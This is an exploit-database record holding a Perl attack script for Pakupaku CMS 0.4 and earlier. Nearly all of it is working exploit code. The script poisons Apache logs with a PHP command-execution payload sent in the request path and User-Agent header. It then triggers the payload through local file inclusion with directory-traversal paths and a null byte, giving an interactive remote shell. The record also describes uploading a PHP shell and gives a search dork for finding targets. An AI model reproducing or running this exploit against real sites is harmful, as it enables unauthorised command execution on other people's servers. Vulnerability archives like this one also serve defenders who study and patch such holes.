{"published": "2007-08-29T00:00:00", "id": "1337DAY-ID-2099", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-04-04T17:31:17", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-04T17:31:17", "rev": 2}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-04-04T17:31:17", "edition": 2, "title": "Pakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability", "href": "https://0day.today/exploit/description/2099", "modified": "2007-08-29T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": [], "sourceHref": "https://0day.today/exploit/2099", "references": [], "reporter": "GoLd_M", "sourceData": "==========================================================\r\nPakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability\r\n==========================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#########################################################################################\r\n# Pakupaku CMS <= 0.4 Remote File Upload Vulnerability \r\n# 1- [Path_Script]/index.php?page=Uploads \r\n# 2- Upload GoLd-M.php <= [Php Shell] \r\n# 3- [Path_Script]/uploads/GoLd-M.php <= [Php Shell] \r\n# D.Script : http://heanet.dl.sourceforge.net/sourceforge/pakupaku/pakupaku-0.4.tar.gz #\r\n#########################################################################################\r\n# D0RK :http://www.google.com/search?client=opera&rls=en&q=Powered+by+Pakupaku+CMS&sourceid=opera&ie=utf-8&oe=utf-8\r\n# Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n#ripped from rgod\r\n@apache=(\r\n\"../../../../../var/log/httpd/access_log\",\r\n\"../../../../../var/log/httpd/error_log\",\r\n\"../apache/logs/error.log\",\r\n\"../apache/logs/access.log\",\r\n\"../../apache/logs/error.log\",\r\n\"../../apache/logs/access.log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../logs/error.log\",\r\n\"../logs/access.log\",\r\n\"../../logs/error.log\",\r\n\"../../logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../etc/httpd/logs/access_log\",\r\n\"../../../../../etc/httpd/logs/access.log\",\r\n\"../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../etc/httpd/logs/error.log\",\r\n\"../../.. /../../var/www/logs/access_log\",\r\n\"../../../../../var/www/logs/access.log\",\r\n\"../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../var/log/apache/access_log\",\r\n\"../../../../../var/log/apache/access.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/www/logs/error_log\",\r\n\"../../../../../var/www/logs/error.log\",\r\n\"../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../var/log/apache/error_log\",\r\n\"../../../../../var/log/apache/error.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/log/error_log\"\r\n);\r\n\r\nprint \" ########################################################################\\n\";\r\nprint \" # Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit #\\n\";\r\nprint \" # Discovered by: GoLd_M = [Mahmood_ali] #\\n\";\r\nprint \" # Thanx To : Tryag-Team & Asbmay's Group & bd0rk & All My Friends #\\n\";\r\nprint \" ########################################################################\\n\\n\";\r\n\r\nif (@ARGV < 3)\r\n{\r\n\r\n print \" ########################################################################\\n\";\r\n print \" # Usage: 3xp|017.pl [site] [Path] [apache_path] #\\n\";\r\n print \" # Apache Path: #\\n\";\r\n print \" ########################################################################\\n\";\r\n $i = 0;\r\n while($apache[$i])\r\n { print \"[$i] $apache[$i]\\n\";$i++;}\r\n exit();\r\n}\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$apachepath=$ARGV[2];\r\n\r\nprint \"[RST] Injecting some code in log files...\\n\";\r\n$CODE=\"<?php ob_clean();system(\\$HTTP_COOKIE_VARS[cmd]);die;?>\";\r\n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"[RST] Could not connect to host.\\n\\n\";\r\nprint $socket \"GET \".$path.$CODE.\" HTTP/1.1\\r\\n\";\r\nprint $socket \"User-Agent: \".$CODE.\"\\r\\n\";\r\nprint $socket \"Host: \".$host.\"\\r\\n\";\r\nprint $socket \"Connection: close\\r\\n\\r\\n\";\r\nclose($socket);\r\nprint \"[RST] Shell!! write q to exit !\\n\";\r\nprint \"[RST] IF not working try another apache path\\n\\n\";\r\n\r\nprint \"[shell] \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"q\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"[RST] Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.\"index.php?page=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"[shell] \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-04] #"}

{}